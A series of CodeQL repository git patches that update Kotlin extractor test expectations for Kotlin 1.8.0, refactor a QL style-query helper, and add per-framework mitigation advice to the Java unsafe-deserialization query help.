java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0/ExperimentalCompilerApi.kt diff --git a/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/FirIncompatiblePluginAPI.kt b/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0/FirIncompatiblePluginAPI.kt similarity index 100% rename from java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/FirIncompatiblePluginAPI.kt rename to java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0/FirIncompatiblePluginAPI.kt From c71ea80029a9db803a4062c0868f9888e17b2b25 Mon Sep 17 00:00:00 2001 From: Ian Lynagh Date: Tue, 10 Jan 2023 12:56:12 +0000 Subject: [PATCH 160/381] Kotlin: Accept test changes We now get better locations, with Kotlin 1.8.0. --- .../PrintAst.expected | 100 +++++++++--------- 1 file changed, 50 insertions(+), 50 deletions(-) diff --git a/java/ql/integration-tests/all-platforms/kotlin/annotation-id-consistency/PrintAst.expected b/java/ql/integration-tests/all-platforms/kotlin/annotation-id-consistency/PrintAst.expected index 751777f3748..6da5da6d522 100644 --- a/java/ql/integration-tests/all-platforms/kotlin/annotation-id-consistency/PrintAst.expected +++ b/java/ql/integration-tests/all-platforms/kotlin/annotation-id-consistency/PrintAst.expected @@ -146,25 +146,24 @@ test.kt: # 19| 1: [Annotation] VarargAnnotation # 0| 1: [ArrayInit] {...} # 20| 2: [Annotation] VarargAnnotation -# 0| 1: [ArrayInit] {...} -# 0| 1: [IntegerLiteral] 1 +# 20| 1: [ArrayInit] {...} +# 20| 1: [IntegerLiteral] 1 # 21| 3: [Annotation] VarargAnnotation -# 0| 1: [ArrayInit] {...} -# 0| 1: [IntegerLiteral] 1 -# 0| 2: [IntegerLiteral] 2 +# 21| 1: [ArrayInit] {...} +# 21| 1: [IntegerLiteral] 1 +# 21| 2: [IntegerLiteral] 2 # 22| 4: [Annotation] VarargAnnotation -# 0| 1: [ArrayInit] {...} -# 0| 1: [IntegerLiteral] 1 -# 0| 2: [IntegerLiteral] 2 -# 0| 3: [IntegerLiteral] 3 +# 22| 1: [ArrayInit] {...} +# 22| 1: [IntegerLiteral] 1 +# 22| 2: [IntegerLiteral] 2 +# 22| 3: [IntegerLiteral] 3 # 23| 5: [Annotation] VarargAnnotation -# 0| 1: [ArrayInit] {...} -# 0| 1: [IntegerLiteral] 1 -# 0| 2: [IntegerLiteral] 2 -# 0| 3: [IntegerLiteral] 3 +# 23| 1: [ArrayInit] {...} +# 23| 1: [IntegerLiteral] 1 +# 23| 2: [IntegerLiteral] 2 +# 23| 3: [IntegerLiteral] 3 # 17| 2: [Annotation] Ann1 -# 0| 1: [IntegerLiteral] 1 -# 0| 2: [Annotation] Ann2 +# 0| 1: [Annotation] Ann2 # 0| 1: [StringLiteral] "Hello" # 0| 2: [TypeLiteral] String.class # 0| 0: [TypeAccess] String @@ -182,16 +181,17 @@ test.kt: # 0| 0: [TypeAccess] String # 0| 2: [TypeLiteral] int.class # 0| 0: [TypeAccess] int -# 0| 3: [VarAccess] DayOfWeek.MONDAY -# 0| -1: [TypeAccess] DayOfWeek +# 17| 2: [IntegerLiteral] 1 +# 17| 3: [VarAccess] DayOfWeek.MONDAY +# 17| -1: [TypeAccess] DayOfWeek # 18| 3: [Annotation] GenericAnnotation -# 0| 1: [TypeLiteral] String.class -# 0| 0: [TypeAccess] String -# 0| 2: [ArrayInit] {...} -# 0| 1: [TypeLiteral] String.class -# 0| 0: [TypeAccess] String -# 0| 2: [TypeLiteral] String.class -# 0| 0: [TypeAccess] String +# 18| 1: [TypeLiteral] String.class +# 18| 0: [TypeAccess] String +# 18| 2: [ArrayInit] {...} +# 18| 1: [TypeLiteral] String.class +# 18| 0: [TypeAccess] String +# 18| 2: [TypeLiteral] String.class +# 18| 0: [TypeAccess] String # 24| 4: [Annotation] AnnWithDefaults # 0| 1: [IntegerLiteral] 1 # 0| 2: [StringLiteral] "hello" @@ -211,25 +211,24 @@ test.kt: # 29| 1: [Annotation] VarargAnnotation # 0| 1: [ArrayInit] {...} # 30| 2: [Annotation] VarargAnnotation -# 0| 1: [ArrayInit] {...} -# 0| 1: [IntegerLiteral] 1 +# 30| 1: [ArrayInit] {...} +# 30| 1: [IntegerLiteral] 1 # 31| 3: [Annotation] VarargAnnotation -# 0| 1: [ArrayInit] {...} -# 0| 1: [IntegerLiteral] 1 -# 0| 2: [IntegerLiteral] 2 +# 31| 1: [ArrayInit] {...} +# 31| 1: [IntegerLiteral] 1 +# 31| 2: [IntegerLiteral] 2 # 32| 4: [Annotation] VarargAnnotation -# 0| 1: [ArrayInit] {...} -# 0| 1: [IntegerLiteral] 1 -# 0| 2: [IntegerLiteral] 2 -# 0| 3: [IntegerLiteral] 3 +# 32| 1: [ArrayInit] {...} +# 32| 1: [IntegerLiteral] 1 +# 32| 2: [IntegerLiteral] 2 +# 32| 3: [IntegerLiteral] 3 # 33| 5: [Annotation] VarargAnnotation -# 0| 1: [ArrayInit] {...} -# 0| 1: [IntegerLiteral] 1 -# 0| 2: [IntegerLiteral] 2 -# 0| 3: [IntegerLiteral] 3 +# 33| 1: [ArrayInit] {...} +# 33| 1: [IntegerLiteral] 1 +# 33| 2: [IntegerLiteral] 2 +# 33| 3: [IntegerLiteral] 3 # 27| 2: [Annotation] Ann1 -# 0| 1: [IntegerLiteral] 1 -# 0| 2: [Annotation] Ann2 +# 0| 1: [Annotation] Ann2 # 0| 1: [StringLiteral] "Hello" # 0| 2: [TypeLiteral] String.class # 0| 0: [TypeAccess] String @@ -247,16 +246,17 @@ test.kt: # 0| 0: [TypeAccess] String # 0| 2: [TypeLiteral] int.class # 0| 0: [TypeAccess] int -# 0| 3: [VarAccess] DayOfWeek.MONDAY -# 0| -1: [TypeAccess] DayOfWeek +# 27| 2: [IntegerLiteral] 1 +# 27| 3: [VarAccess] DayOfWeek.MONDAY +# 27| -1: [TypeAccess] DayOfWeek # 28| 3: [Annotation] GenericAnnotation -# 0| 1: [TypeLiteral] String.class -# 0| 0: [TypeAccess] String -# 0| 2: [ArrayInit] {...} -# 0| 1: [TypeLiteral] String.class -# 0| 0: [TypeAccess] String -# 0| 2: [TypeLiteral] String.class -# 0| 0: [TypeAccess] String +# 28| 1: [TypeLiteral] String.class +# 28| 0: [TypeAccess] String +# 28| 2: [ArrayInit] {...} +# 28| 1: [TypeLiteral] String.class +# 28| 0: [TypeAccess] String +# 28| 2: [TypeLiteral] String.class +# 28| 0: [TypeAccess] String # 34| 4: [Annotation] AnnWithDefaults # 0| 1: [IntegerLiteral] 1 # 0| 2: [StringLiteral] "hello" @@ -279,7 +279,7 @@ test.kt: # 40| 11: [Class] HasKotlinDeprecatedAnnotationUsedByJava #-----| -3: (Annotations) # 40| 1: [Annotation] Deprecated -# 0| 1: [StringLiteral] "Kotlin deprecation message 1" +# 40| 1: [StringLiteral] "Kotlin deprecation message 1" # 41| 1: [Constructor] HasKotlinDeprecatedAnnotationUsedByJava # 40| 5: [BlockStmt] { ... } # 40| 0: [SuperConstructorInvocationStmt] super(...) @@ -294,7 +294,7 @@ test.kt: # 46| 13: [Class] HasKotlinDeprecatedAnnotationUsedByKotlin #-----| -3: (Annotations) # 46| 1: [Annotation] Deprecated -# 0| 1: [StringLiteral] "Kotlin deprecation message 2" +# 46| 1: [StringLiteral] "Kotlin deprecation message 2" # 47| 1: [Constructor] HasKotlinDeprecatedAnnotationUsedByKotlin # 46| 5: [BlockStmt] { ... } # 46| 0: [SuperConstructorInvocationStmt] super(...) From b7eb521fa037f62ec7fa818b2a556b7897d267d8 Mon Sep 17 00:00:00 2001 From: Ian Lynagh Date: Tue, 10 Jan 2023 13:04:36 +0000 Subject: [PATCH 161/381] Kotlin: Fix custom_plugin test for Kotlin 1.8.0 --- .../linux-only/kotlin/custom_plugin/plugin/Plugin.kt | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/java/ql/integration-tests/linux-only/kotlin/custom_plugin/plugin/Plugin.kt b/java/ql/integration-tests/linux-only/kotlin/custom_plugin/plugin/Plugin.kt index d80801974e2..f45b4804393 100644 --- a/java/ql/integration-tests/linux-only/kotlin/custom_plugin/plugin/Plugin.kt +++ b/java/ql/integration-tests/linux-only/kotlin/custom_plugin/plugin/Plugin.kt @@ -2,11 +2,13 @@ package com.github.codeql import com.intellij.mock.MockProject import org.jetbrains.kotlin.backend.common.IrElementTransformerVoidWithContext +import org.jetbrains.kotlin.backend.common.extensions.FirIncompatiblePluginAPI import org.jetbrains.kotlin.backend.common.extensions.IrGenerationExtension import org.jetbrains.kotlin.backend.common.extensions.IrPluginContext import org.jetbrains.kotlin.backend.common.ir.addDispatchReceiver import org.jetbrains.kotlin.backend.common.lower.DeclarationIrBuilder import org.jetbrains.kotlin.compiler.plugin.ComponentRegistrar +import org.jetbrains.kotlin.compiler.plugin.ExperimentalCompilerApi import org.jetbrains.kotlin.config.CompilerConfiguration import org.jetbrains.kotlin.descriptors.ClassKind import org.jetbrains.kotlin.descriptors.DescriptorVisibilities @@ -35,6 +37,7 @@ import org.jetbrains.kotlin.ir.util.defaultType import org.jetbrains.kotlin.name.FqName import org.jetbrains.kotlin.name.Name +@OptIn(ExperimentalCompilerApi::class) class TestComponentRegistrar : ComponentRegistrar { override fun registerProjectComponents( project: MockProject, @@ -188,6 +191,7 @@ class IrAdder : IrGenerationExtension { } private fun addFunWithUnsafeCoerce(declaration: IrClass) { + @OptIn(FirIncompatiblePluginAPI::class) val uintType = pluginContext.referenceClass(FqName("kotlin.UInt"))!!.owner.typeWith() declaration.declarations.add(pluginContext.irFactory.buildFun { name = Name.identifier("") @@ -264,6 +268,7 @@ class IrAdder : IrGenerationExtension { name = Name.identifier("start") origin = IrDeclarationOrigin.IR_EXTERNAL_JAVA_DECLARATION_STUB modality = Modality.FINAL + @OptIn(FirIncompatiblePluginAPI::class) returnType = pluginContext.referenceClass(FqName("java.lang.Process"))!!.owner.defaultType }.apply { addDispatchReceiver { type = processBuilderStubType } From 3367da82c43193a908c5f9ed92192a6c430b776f Mon Sep 17 00:00:00 2001 From: Ian Lynagh Date: Tue, 10 Jan 2023 14:24:33 +0000 Subject: [PATCH 162/381] Kotlin: Accept test changes We get better locations with Kotlin 1.8.0. --- .../annotation_classes/PrintAst.expected | 78 +++++++++---------- .../annotation_classes/classes.expected | 10 +-- 2 files changed, 44 insertions(+), 44 deletions(-) diff --git a/java/ql/test/kotlin/library-tests/annotation_classes/PrintAst.expected b/java/ql/test/kotlin/library-tests/annotation_classes/PrintAst.expected index c457b0811dd..0ff19b747fa 100644 --- a/java/ql/test/kotlin/library-tests/annotation_classes/PrintAst.expected +++ b/java/ql/test/kotlin/library-tests/annotation_classes/PrintAst.expected @@ -108,39 +108,39 @@ def.kt: # 0| 9: [VarAccess] ElementType.TYPE_USE # 0| -1: [TypeAccess] ElementType # 5| 3: [Annotation] Target -# 0| 1: [ArrayInit] {...} -# 0| 1: [VarAccess] AnnotationTarget.CLASS -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 2: [VarAccess] AnnotationTarget.ANNOTATION_CLASS -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 3: [VarAccess] AnnotationTarget.TYPE_PARAMETER -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 4: [VarAccess] AnnotationTarget.PROPERTY -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 5: [VarAccess] AnnotationTarget.FIELD -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 6: [VarAccess] AnnotationTarget.LOCAL_VARIABLE -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 7: [VarAccess] AnnotationTarget.VALUE_PARAMETER -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 8: [VarAccess] AnnotationTarget.CONSTRUCTOR -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 9: [VarAccess] AnnotationTarget.FUNCTION -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 10: [VarAccess] AnnotationTarget.PROPERTY_GETTER -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 11: [VarAccess] AnnotationTarget.PROPERTY_SETTER -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 12: [VarAccess] AnnotationTarget.TYPE -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 13: [VarAccess] AnnotationTarget.FILE -# 0| -1: [TypeAccess] AnnotationTarget -# 0| 14: [VarAccess] AnnotationTarget.TYPEALIAS -# 0| -1: [TypeAccess] AnnotationTarget +# 5| 1: [ArrayInit] {...} +# 5| 1: [VarAccess] AnnotationTarget.CLASS +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 2: [VarAccess] AnnotationTarget.ANNOTATION_CLASS +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 3: [VarAccess] AnnotationTarget.TYPE_PARAMETER +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 4: [VarAccess] AnnotationTarget.PROPERTY +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 5: [VarAccess] AnnotationTarget.FIELD +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 6: [VarAccess] AnnotationTarget.LOCAL_VARIABLE +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 7: [VarAccess] AnnotationTarget.VALUE_PARAMETER +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 8: [VarAccess] AnnotationTarget.CONSTRUCTOR +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 9: [VarAccess] AnnotationTarget.FUNCTION +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 10: [VarAccess] AnnotationTarget.PROPERTY_GETTER +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 11: [VarAccess] AnnotationTarget.PROPERTY_SETTER +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 12: [VarAccess] AnnotationTarget.TYPE +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 13: [VarAccess] AnnotationTarget.FILE +# 5| -1: [TypeAccess] AnnotationTarget +# 5| 14: [VarAccess] AnnotationTarget.TYPEALIAS +# 5| -1: [TypeAccess] AnnotationTarget # 21| 1: [Method] a #-----| 1: (Annotations) # 21| 1: [Annotation] JvmName -# 0| 1: [StringLiteral] "a" +# 21| 1: [StringLiteral] "a" # 21| 3: [TypeAccess] int # 23| 3: [Interface] Annot1k #-----| -3: (Annotations) @@ -201,21 +201,21 @@ def.kt: # 38| 6: [Class] Z #-----| -3: (Annotations) # 38| 1: [Annotation] Annot0k -# 0| 1: [IntegerLiteral] 1 +# 38| 1: [IntegerLiteral] 1 # 39| 2: [Annotation] Annot1k # 0| 1: [IntegerLiteral] 2 # 0| 2: [StringLiteral] "ab" # 0| 3: [TypeLiteral] X.class # 0| 0: [TypeAccess] X -# 0| 4: [VarAccess] Y.B -# 0| -1: [TypeAccess] Y -# 0| 5: [ArrayInit] {...} -# 0| 1: [VarAccess] Y.C -# 0| -1: [TypeAccess] Y -# 0| 2: [VarAccess] Y.A -# 0| -1: [TypeAccess] Y -# 0| 6: [Annotation] Annot0k +# 0| 4: [Annotation] Annot0k # 0| 1: [IntegerLiteral] 1 +# 39| 5: [VarAccess] Y.B +# 39| -1: [TypeAccess] Y +# 39| 6: [ArrayInit] {...} +# 39| 1: [VarAccess] Y.C +# 39| -1: [TypeAccess] Y +# 39| 2: [VarAccess] Y.A +# 39| -1: [TypeAccess] Y # 42| 1: [Constructor] Z #-----| 1: (Annotations) # 41| 1: [Annotation] Annot0k diff --git a/java/ql/test/kotlin/library-tests/annotation_classes/classes.expected b/java/ql/test/kotlin/library-tests/annotation_classes/classes.expected index b04dd33d2e7..01f5581b73a 100644 --- a/java/ql/test/kotlin/library-tests/annotation_classes/classes.expected +++ b/java/ql/test/kotlin/library-tests/annotation_classes/classes.expected @@ -36,16 +36,16 @@ annotationValues | def.kt:0:0:0:0 | Retention | def.kt:0:0:0:0 | RetentionPolicy.RUNTIME | | def.kt:0:0:0:0 | Retention | def.kt:0:0:0:0 | RetentionPolicy.RUNTIME | | def.kt:0:0:0:0 | Target | def.kt:0:0:0:0 | {...} | -| def.kt:5:1:20:1 | Target | def.kt:0:0:0:0 | {...} | -| def.kt:21:26:21:42 | JvmName | def.kt:0:0:0:0 | "a" | +| def.kt:5:1:20:1 | Target | def.kt:5:9:5:30 | {...} | +| def.kt:21:26:21:42 | JvmName | def.kt:21:39:21:41 | "a" | | def.kt:23:1:23:8 | Annot0k | def.kt:0:0:0:0 | 0 | -| def.kt:38:1:38:17 | Annot0k | def.kt:0:0:0:0 | 1 | +| def.kt:38:1:38:17 | Annot0k | def.kt:38:16:38:16 | 1 | | def.kt:39:1:39:40 | Annot1k | def.kt:0:0:0:0 | 2 | | def.kt:39:1:39:40 | Annot1k | def.kt:0:0:0:0 | "ab" | | def.kt:39:1:39:40 | Annot1k | def.kt:0:0:0:0 | Annot0k | | def.kt:39:1:39:40 | Annot1k | def.kt:0:0:0:0 | X.class | -| def.kt:39:1:39:40 | Annot1k | def.kt:0:0:0:0 | Y.B | -| def.kt:39:1:39:40 | Annot1k | def.kt:0:0:0:0 | {...} | +| def.kt:39:1:39:40 | Annot1k | def.kt:39:14:39:16 | Y.B | +| def.kt:39:1:39:40 | Annot1k | def.kt:39:23:39:39 | {...} | | def.kt:41:5:41:12 | Annot0k | def.kt:0:0:0:0 | 0 | | def.kt:45:1:45:8 | Annot0k | def.kt:0:0:0:0 | 0 | | def.kt:46:21:46:28 | Annot0k | def.kt:0:0:0:0 | 0 | From ae8c75ac97c5230eb86d3bc685c28a9599e92764 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Tue, 10 Jan 2023 13:34:44 +0100 Subject: [PATCH 163/381] Generalize ConjunctionParent --- .../src/codeql_ql/style/ConjunctionParent.qll | 45 +++++++++++++++++++ ql/ql/src/queries/style/OmittableExists.ql | 28 +++++++----- .../src/queries/style/RedundantAssignment.ql | 45 +++---------------- 3 files changed, 69 insertions(+), 49 deletions(-) create mode 100644 ql/ql/src/codeql_ql/style/ConjunctionParent.qll diff --git a/ql/ql/src/codeql_ql/style/ConjunctionParent.qll b/ql/ql/src/codeql_ql/style/ConjunctionParent.qll new file mode 100644 index 00000000000..f3b96f18b11 --- /dev/null +++ b/ql/ql/src/codeql_ql/style/ConjunctionParent.qll @@ -0,0 +1,45 @@ +import ql + +signature predicate checkAstNodeSig(AstNode p); + +module ConjunctionParent { + /** + * Gets the top-most parent of `p` that is not a disjunction. + */ + AstNode getConjunctionParent(AstNode p) { + result = + min(int level, AstNode parent | + parent = getConjunctionParentRec(p) and level = level(parent) + | + parent order by level + ) + } + + /** + * Gets a (transitive) parent of `p`, where the parent is not a negative edge, and `checkAstNode(p)` holds. + */ + private AstNode getConjunctionParentRec(AstNode p) { + checkAstNode(p) and + result = p + or + result = getConjunctionParentRec(p).getParent() and + not result instanceof Disjunction and + not result instanceof IfFormula and + not result instanceof Implication and + not result instanceof Negation and + not result instanceof Predicate and + not result instanceof FullAggregate and + not result instanceof Forex and + not result instanceof Forall + } + + /** + * Gets which level in the AST `p` is at. + * E.g. the top-level is 0, the next level is 1, etc. + */ + private int level(AstNode p) { + p instanceof TopLevel and result = 0 + or + result = level(p.getParent()) + 1 + } +} diff --git a/ql/ql/src/queries/style/OmittableExists.ql b/ql/ql/src/queries/style/OmittableExists.ql index c6e47c260df..4da6342fabf 100644 --- a/ql/ql/src/queries/style/OmittableExists.ql +++ b/ql/ql/src/queries/style/OmittableExists.ql @@ -9,15 +9,14 @@ */ import ql +import codeql_ql.style.ConjunctionParent -class AggregateOrForQuantifier extends AstNode { - AggregateOrForQuantifier() { - this instanceof FullAggregate or this instanceof Forex or this instanceof Forall - } -} - -from VarDecl existsArgument, VarAccess use -where +/** + * Holds if `existsArgument` is the declaration of a variable in an `exists` formula, + * and `use` is both its only use and an argument of a predicate that doesn't restrict + * the corresponding parameter type. + */ +predicate omittableExists(VarDecl existsArgument, VarAccess use) { existsArgument = any(Exists e).getAnArgument() and use = unique( | | existsArgument.getAnAccess()) and exists(Call c, int argPos, Type paramType | @@ -25,7 +24,16 @@ where | existsArgument.getType() = paramType.getASuperType*() and not paramType instanceof DatabaseType - ) and - not use.getParent*() instanceof AggregateOrForQuantifier + ) +} + +/** Holds if `p` is an exists variable (either declaration or use) that can be omitted. */ +predicate omittableExistsNode(AstNode p) { omittableExists(p, _) or omittableExists(_, p) } + +from VarDecl existsArgument, VarAccess use +where + omittableExists(existsArgument, use) and + ConjunctionParent::getConjunctionParent(existsArgument) = + ConjunctionParent::getConjunctionParent(use) select existsArgument, "This exists variable can be omitted by using a don't-care expression $@.", use, "in this argument" diff --git a/ql/ql/src/queries/style/RedundantAssignment.ql b/ql/ql/src/queries/style/RedundantAssignment.ql index 7baf046b97a..83f62364d9f 100644 --- a/ql/ql/src/queries/style/RedundantAssignment.ql +++ b/ql/ql/src/queries/style/RedundantAssignment.ql @@ -9,6 +9,8 @@ */ import ql +import codeql_ql.style.ConjunctionParent +import codeql.GlobalValueNumbering as GVN /** * A variable that is set equal to (assigned) a value one or more times. @@ -40,8 +42,6 @@ class AssignedVariable extends VarDecl { } } -import codeql.GlobalValueNumbering as GVN - /** * Holds if `assigned1` and `assigned2` assigns the same value to `var`. * The assignments may be on different branches of a disjunction. @@ -58,47 +58,14 @@ predicate candidateRedundantAssignment(AssignedVariable var, Expr assigned1, Exp assigned1 != assigned2 } -/** - * Gets a (transitive) parent of `p`, where the parent is not a disjunction, and `p` is a candidate assignment from `candidateRedundantAssignment`. - */ -AstNode getConjunctionParentRec(AstNode p) { - candidateRedundantAssignment(_, p, _) and - result = p - or - result = getConjunctionParentRec(p).getParent() and - not result instanceof Disjunction and - not result instanceof IfFormula and - not result instanceof Implication and - not result instanceof Negation and - not result instanceof Predicate -} - -/** - * Gets which level in the AST `p` is at. - * E.g. the top-level is 0, the next level is 1, etc. - */ -int level(AstNode p) { - p instanceof TopLevel and result = 0 - or - result = level(p.getParent()) + 1 -} - -/** - * Gets the top-most parent of `p` that is not a disjunction. - */ -AstNode getConjunctionParent(AstNode p) { - result = - min(int level, AstNode parent | - parent = getConjunctionParentRec(p) and level = level(parent) - | - parent order by level - ) -} +/** Holds if `p` is a candidate node for redundant assignment. */ +predicate candidateNode(AstNode p) { candidateRedundantAssignment(_, p, _) } from AssignedVariable var, Expr assigned1, Expr assigned2 where candidateRedundantAssignment(var, assigned1, assigned2) and - getConjunctionParent(assigned1) = getConjunctionParent(assigned2) and + ConjunctionParent::getConjunctionParent(assigned1) = + ConjunctionParent::getConjunctionParent(assigned2) and // de-duplcation: ( assigned1.getLocation().getStartLine() < assigned2.getLocation().getStartLine() From 3fa11c21c392b2daa847c7e387bffa94351aea48 Mon Sep 17 00:00:00 2001 From: Jonathan Leitschuh Date: Wed, 14 Dec 2022 14:35:24 -0500 Subject: [PATCH 164/381] [Java] Document fixes for deserialization vulnerabilities by framework Related https://github.com/github/codeql/issues/11603 --- .../CWE/CWE-502/UnsafeDeserialization.qhelp | 55 ++++++++++++++++++- 1 file changed, 54 insertions(+), 1 deletion(-) diff --git a/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp b/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp index d1933ad4ac2..8d6bd34dab2 100644 --- a/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp +++ b/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp @@ -51,6 +51,59 @@ from the input stream removes the vulnerability.     +

    + +Fixes by framework + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    ProjectMaven CordinatesSecure by DefaultFix
    XMLDecoderJava Standard LibraryNoDon't use XMLDecoder with untrusted user input. It is impossible to secure.
    ObjectInputStreamJava Standard LibraryNoLeverage a validating input stream like org.apache.commons.io.serialization.ValidatingObjectInputStream
    FastJsoncom.alibaba:fastjsonPartiallyCall com.alibaba.fastjson.parser.ParserConfig#setSafeMode with the argument true
    SnakeYAMLorg.yaml:snakeyamlNo. Maintainer response.Instantiate the org.yaml.snakeyaml.Yaml instance explicitly with an instance of org.yaml.snakeyaml.constructor.SafeConstructor as an argument.
    FasterXML jackson-databindcom.fasterxml.jackson.core:jackson-databindYes + Don't call com.fasterxml.jackson.databind.ObjectMapper#enableDefaultTyping and don't annotate any object fields with com.fasterxml.jackson.annotation.JsonTypeInfo passing either the CLASS or MINIMAL_CLASS values to the annotation. + Read this guide. +
    Kryocom.esotericsoftware:kryo and com.esotericsoftware:kryo5com.esotericsoftware:kryo versions including & after 5.0.0 Yes; com.esotericsoftware:kryo5 YesDon't call com.esotericsoftware.kryo(5).Kryo#setRegistrationRequired with the argument false.
    +

  • @@ -74,7 +127,7 @@ Alvaro Muñoz & Christian Schneider, RSAConference 2016:
  • SnakeYaml documentation on deserialization: -SnakeYaml deserialization. +SnakeYaml deserialization.
  • Hessian deserialization and related gadget chains: From b7364f542886898b29f5a16c7e247536ff6c3793 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Mon, 19 Dec 2022 10:08:13 +0100 Subject: [PATCH 165/381] Update UnsafeDeserialization.qhelp Move the table under , minor fixes. --- .../CWE/CWE-502/UnsafeDeserialization.qhelp | 108 +++++++++--------- 1 file changed, 54 insertions(+), 54 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp b/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp index 8d6bd34dab2..2e9a368a9f0 100644 --- a/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp +++ b/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp @@ -28,11 +28,64 @@ for example JSON or XML. However, these formats should not be deserialized into complex objects because this provides further opportunities for attack. For example, XML-based deserialization attacks are possible through libraries such as XStream and XmlDecoder. - +

    +

    Alternatively, a tightly controlled whitelist can limit the vulnerability of code, but be aware of the existence of so-called Bypass Gadgets, which can circumvent such protection measures.

    +

    +Fixes by framework: +

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    ProjectMaven CoordinatesSecure by DefaultFix
    XMLDecoderJava Standard LibraryNoDon't use XMLDecoder with untrusted user input. It is impossible to secure.
    ObjectInputStreamJava Standard LibraryNoLeverage a validating input stream like org.apache.commons.io.serialization.ValidatingObjectInputStream.
    FastJsoncom.alibaba:fastjsonPartiallyCall com.alibaba.fastjson.parser.ParserConfig#setSafeMode with the argument true.
    SnakeYAMLorg.yaml:snakeyamlNo (maintainer response)Instantiate the org.yaml.snakeyaml.Yaml instance explicitly with an instance of org.yaml.snakeyaml.constructor.SafeConstructor as an argument.
    FasterXML jackson-databindcom.fasterxml.jackson.core:jackson-databindYes + Don't call com.fasterxml.jackson.databind.ObjectMapper#enableDefaultTyping and don't annotate any object fields with com.fasterxml.jackson.annotation.JsonTypeInfo passing either the CLASS or MINIMAL_CLASS values to the annotation. + Read this guide. +
    Kryocom.esotericsoftware:kryo and com.esotericsoftware:kryo5com.esotericsoftware:kryo >= 5.0.0 and com.esotericsoftware:kryo5 YesDon't call com.esotericsoftware.kryo(5).Kryo#setRegistrationRequired with the argument false.
     @@ -51,59 +104,6 @@ from the input stream removes the vulnerability. -

    - -Fixes by framework - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ProjectMaven CordinatesSecure by DefaultFix
    XMLDecoderJava Standard LibraryNoDon't use XMLDecoder with untrusted user input. It is impossible to secure.
    ObjectInputStreamJava Standard LibraryNoLeverage a validating input stream like org.apache.commons.io.serialization.ValidatingObjectInputStream
    FastJsoncom.alibaba:fastjsonPartiallyCall com.alibaba.fastjson.parser.ParserConfig#setSafeMode with the argument true
    SnakeYAMLorg.yaml:snakeyamlNo. Maintainer response.Instantiate the org.yaml.snakeyaml.Yaml instance explicitly with an instance of org.yaml.snakeyaml.constructor.SafeConstructor as an argument.
    FasterXML jackson-databindcom.fasterxml.jackson.core:jackson-databindYes - Don't call com.fasterxml.jackson.databind.ObjectMapper#enableDefaultTyping and don't annotate any object fields with com.fasterxml.jackson.annotation.JsonTypeInfo passing either the CLASS or MINIMAL_CLASS values to the annotation. - Read this guide. -
    Kryocom.esotericsoftware:kryo and com.esotericsoftware:kryo5com.esotericsoftware:kryo versions including & after 5.0.0 Yes; com.esotericsoftware:kryo5 YesDon't call com.esotericsoftware.kryo(5).Kryo#setRegistrationRequired with the argument false.
    -

  • From 1d7881e03fc26730e1ca40e03ed5e1b150e1d922 Mon Sep 17 00:00:00 2001 From: Jonathan Leitschuh Date: Tue, 3 Jan 2023 13:36:36 -0500 Subject: [PATCH 166/381] Apply suggestions from code review Co-authored-by: Chris Smowton --- .../CWE/CWE-502/UnsafeDeserialization.qhelp | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp b/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp index 2e9a368a9f0..aa421154d1e 100644 --- a/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp +++ b/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp @@ -35,7 +35,7 @@ of the existence of so-called Bypass Gadgets, which can circumvent such protection measures.

    -Fixes by framework: +Recommendations specific to particular frameworks supported by this query:

    @@ -43,38 +43,38 @@ Fixes by framework: - + - + - + - + - + @@ -82,7 +82,7 @@ Fixes by framework: - +
    Project Maven Coordinates Secure by DefaultFixRecommendation
    XMLDecoder Java Standard Library NoDon't use XMLDecoder with untrusted user input. It is impossible to secure.Do not use with untrusted user input.
